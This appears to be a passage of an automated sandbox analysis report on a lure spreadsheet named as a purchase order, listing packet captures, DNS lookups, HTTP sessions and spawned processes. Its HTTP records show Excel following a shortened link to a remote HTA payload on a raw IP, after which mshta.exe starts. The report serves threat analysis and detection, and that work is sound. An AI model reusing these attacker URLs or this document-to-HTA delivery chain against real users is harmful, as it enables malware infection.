                                Mar 26, 2025 19:48:44.683038950 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.683064938 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.684160948 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.709306955 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.709332943 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.709414005 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.709429026 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.709512949 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.709512949 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.733814955 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.733866930 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.733928919 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.733952045 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.734091043 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.761071920 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.761096001 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.761172056 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.761195898 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.761830091 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.787091970 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.787117004 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.787473917 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.787492037 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.787906885 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.815304041 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.815329075 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.815464973 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.815465927 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.815480947 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.815654993 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.838557005 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.838582039 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.838651896 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.838675976 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.838872910 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.861789942 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.861814976 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.861865997 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.861877918 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.861927986 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.883110046 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.883133888 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.883164883 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.883230925 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.883238077 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.883291960 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.913012981 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.913037062 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.913084030 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.913094044 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.913147926 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.934176922 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.934201002 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.934242010 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.934252977 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.934304953 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.956619978 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.956645966 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.956696987 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.956707954 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.956768036 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.981106043 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.981131077 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.981209040 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:44.981219053 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:44.981259108 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.004823923 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.004853964 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.005000114 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.005009890 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.005050898 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.026184082 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.026211023 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.026278019 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.026288986 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.026320934 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.026340008 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.043447018 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.043454885 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.043520927 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.043529987 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.043564081 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.064011097 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.064042091 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.064135075 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.064146042 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.064184904 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.095527887 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.095552921 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.095624924 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.095624924 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.095633030 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.095671892 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.115428925 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.115453959 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.115497112 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.115504026 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.115545988 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.135063887 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.135086060 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.135137081 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.135143995 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.135185003 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.135205030 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.151180983 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.151206970 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.151248932 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.151258945 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.151292086 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.151309967 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.180490971 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.180509090 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.180583000 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.180593967 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.180629015 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.180644035 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.199013948 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.199040890 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.199080944 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.199088097 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.199136972 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.218717098 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.218739033 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.218799114 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.218820095 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.218837976 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.218899012 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.238194942 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.238231897 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.238274097 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.238287926 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.238329887 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.238349915 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.254138947 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.254165888 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.254220963 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.254240990 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.254272938 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.254293919 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.276855946 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.276885033 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.276978016 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.276997089 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.277043104 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.295351982 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.295375109 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.295469046 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.295478106 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.295527935 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.311609030 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.311631918 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.311693907 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.311709881 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.311760902 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.331408978 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.331439018 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.331501007 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.331517935 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.331561089 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.352245092 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.352276087 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.352319002 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.352329969 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.352386951 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.372335911 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.372363091 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.372431040 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.372443914 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.372487068 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.389516115 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.389537096 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.389590979 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.389602900 CET4434969913.107.246.41192.168.2.7
                                Mar 26, 2025 19:48:45.389640093 CET49699443192.168.2.713.107.246.41
                                Mar 26, 2025 19:48:45.406511068 CET4434969913.107.246.41192.168.2.7
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Mar 26, 2025 19:48:11.058974028 CET | 53 | 65115 | 162.159.36.2 | 192.168.2.7
                                Mar 26, 2025 19:48:29.217129946 CET | 53462 | 53 | 192.168.2.7 | 1.1.1.1
                                Mar 26, 2025 19:48:29.305866003 CET | 53 | 53462 | 1.1.1.1 | 192.168.2.7
                                Mar 26, 2025 19:48:43.459641933 CET | 59190 | 53 | 192.168.2.7 | 1.1.1.1
                                Mar 26, 2025 19:48:43.547921896 CET | 53 | 59190 | 1.1.1.1 | 192.168.2.7

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Mar 26, 2025 19:48:29.217129946 CET | 192.168.2.7 | 1.1.1.1 | 0xc208 | Standard query (0) | agr.my | A (IP address) | IN (0x0001) | false
                                Mar 26, 2025 19:48:43.459641933 CET | 192.168.2.7 | 1.1.1.1 | 0x15d | Standard query (0) | otelrules.svc.static.microsoft | A (IP address) | IN (0x0001) | false

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Mar 26, 2025 19:47:38.656852961 CET | 1.1.1.1 | 192.168.2.7 | 0x9472 | No error (0) | ecs-office.s-0005.dual-s-msedge.net | shed.s-0005.dual-s-dc-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                Mar 26, 2025 19:47:38.656852961 CET | 1.1.1.1 | 192.168.2.7 | 0x9472 | No error (0) | shed.s-0005.dual-s-dc-msedge.net | s-0005.dual-s-dc-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                Mar 26, 2025 19:47:38.656852961 CET | 1.1.1.1 | 192.168.2.7 | 0x9472 | No error (0) | s-0005.dual-s-dc-msedge.net | - | 52.123.130.14 | A (IP address) | IN (0x0001) | false
                                Mar 26, 2025 19:47:38.656852961 CET | 1.1.1.1 | 192.168.2.7 | 0x9472 | No error (0) | s-0005.dual-s-dc-msedge.net | - | 52.123.131.14 | A (IP address) | IN (0x0001) | false
                                Mar 26, 2025 19:48:29.305866003 CET | 1.1.1.1 | 192.168.2.7 | 0xc208 | No error (0) | agr.my | - | 147.79.86.93 | A (IP address) | IN (0x0001) | false
                                Mar 26, 2025 19:48:43.547921896 CET | 1.1.1.1 | 192.168.2.7 | 0x15d | No error (0) | otelrules.svc.static.microsoft | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                Mar 26, 2025 19:48:43.547921896 CET | 1.1.1.1 | 192.168.2.7 | 0x15d | No error (0) | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                Mar 26, 2025 19:48:43.547921896 CET | 1.1.1.1 | 192.168.2.7 | 0x15d | No error (0) | star-azurefd-prod.trafficmanager.net | shed.dual-low.s-part-0013.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                Mar 26, 2025 19:48:43.547921896 CET | 1.1.1.1 | 192.168.2.7 | 0x15d | No error (0) | shed.dual-low.s-part-0013.t-0009.t-msedge.net | s-part-0013.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                Mar 26, 2025 19:48:43.547921896 CET | 1.1.1.1 | 192.168.2.7 | 0x15d | No error (0) | s-part-0013.t-0009.t-msedge.net | - | 13.107.246.41 | A (IP address) | IN (0x0001) | false

                                • agr.my
                                • otelrules.svc.static.microsoft
                                • 172.245.123.32

                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.7 | 49698 | 172.245.123.32 | 80 | 6896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

                                Timestamp | Bytes transferred | Direction | Data
                                Mar 26, 2025 19:48:30.293559074 CET | 251 | OUT | GET /xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Connection: Keep-Alive
                                Host: 172.245.123.32
                                Mar 26, 2025 19:48:30.395308971 CET | 1031 | IN | HTTP/1.1 200 OK
                                Date: Wed, 26 Mar 2025 18:48:30 GMT
                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                Last-Modified: Wed, 26 Mar 2025 17:58:33 GMT
                                ETag: "17d1-6314295f8a8a9"
                                Accept-Ranges: bytes
                                Content-Length: 6097
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/hta


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.7 | 49697 | 147.79.86.93 | 443 | 6896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

                                Timestamp | Bytes transferred | Direction | Data
                                2025-03-26 18:48:29 UTC | 209 | OUT | GET /vJcD8F?&silk=enthusiastic HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Host: agr.my
                                Connection: Keep-Alive
                                2025-03-26 18:48:30 UTC | 463 | IN | HTTP/1.1 302 Found
                                Content-Length: 103
                                Content-Type: text/plain; charset=utf-8
                                Date: Wed, 26 Mar 2025 18:48:30 GMT
                                Location: http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal
                                Strict-Transport-Security: max-age=15552000; includeSubDomains
                                Vary: Accept
                                X-Content-Type-Options: nosniff
                                X-Dns-Prefetch-Control: off
                                X-Download-Options: noopen
                                X-Frame-Options: SAMEORIGIN
                                X-Xss-Protection: 1; mode=block
                                Connection: close
                                2025-03-26 18:48:30 UTC | 103 | IN | Data Ascii: Found. Redirecting to http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.7 | 49699 | 13.107.246.41 | 443 | 6896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

                                Timestamp | Bytes transferred | Direction | Data
                                2025-03-26 18:48:43 UTC | 226 | OUT | GET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                Host: otelrules.svc.static.microsoft
                                2025-03-26 18:48:44 UTC | 493 | IN | HTTP/1.1 200 OK
                                Date: Wed, 26 Mar 2025 18:48:43 GMT
                                Content-Type: text/plain
                                Content-Length: 1114783
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public
                                Last-Modified: Mon, 24 Mar 2025 13:40:54 GMT
                                ETag: "0x8DD6AD97FEF19EF"
                                x-ms-request-id: c143ef55-001e-005a-3b72-9ec3d0000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20250326T184843Z-17cccd5449bg7c4bhC1EWR84740000000hdg00000000dhec
                                x-fd-int-roxy-purgeid: 0
                                X-Cache-Info: L1_T2
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                                2025-03-26 18:48:44 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                                Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.7 | 49701 | 13.107.246.41 | 443 | 6896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                Timestamp | Bytes transferred | Direction | Data
                                2025-03-26 18:48:51 UTC | 214 | OUT | GET /rules/rule120607v1s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                Host: otelrules.svc.static.microsoft
                                2025-03-26 18:48:51 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Wed, 26 Mar 2025 18:48:51 GMT
                                Content-Type: text/xml
                                Content-Length: 204
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                ETag: "0x8DC582BB6C8527A"
                                x-ms-request-id: 7dec2a2a-f01e-0085-7e59-9e88ea000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20250326T184851Z-186b855ff67x7nlmhC1NYCzz4s0000000hf000000000292m
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2025-03-26 18:48:51 UTC | 204 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.7 | 49702 | 13.107.246.41 | 443 | 6896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                Timestamp | Bytes transferred | Direction | Data
                                2025-03-26 18:48:51 UTC | 214 | OUT | GET /rules/rule120603v8s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                Host: otelrules.svc.static.microsoft
                                2025-03-26 18:48:51 UTC | 515 | IN | HTTP/1.1 200 OK
                                Date: Wed, 26 Mar 2025 18:48:51 GMT
                                Content-Type: text/xml
                                Content-Length: 2128
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                ETag: "0x8DC582BA41F3C62"
                                x-ms-request-id: 788ac460-101e-0028-1057-9e8f64000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20250326T184851Z-186b855ff67w57v5hC1NYC7m500000000hkg00000000022x
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                X-Cache-Info: L1_T2
                                Accept-Ranges: bytes
                                2025-03-26 18:48:51 UTC | 2128 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=



                                Target ID:0
                                Start time:14:47:33
                                Start date:26/03/2025
                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Imagebase:0x1d0000
                                File size:53'161'064 bytes
                                MD5 hash:4A871771235598812032C822E6F68F19
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:11
                                Start time:14:48:29
                                Start date:26/03/2025
                                Path:C:\Windows\SysWOW64\mshta.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                                Imagebase:0xdd0000
                                File size:13'312 bytes
                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:13
                                Start time:14:48:38
                                Start date:26/03/2025
                                Path:C:\Windows\splwow64.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\splwow64.exe 12288
                                Imagebase:0x7ff611620000
                                File size:163'840 bytes
                                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:15
                                Start time:14:48:48
                                Start date:26/03/2025
                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 517-2025.xla.xlsx"
                                Imagebase:0x1d0000
                                File size:53'161'064 bytes
                                MD5 hash:4A871771235598812032C822E6F68F19
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                No disassembly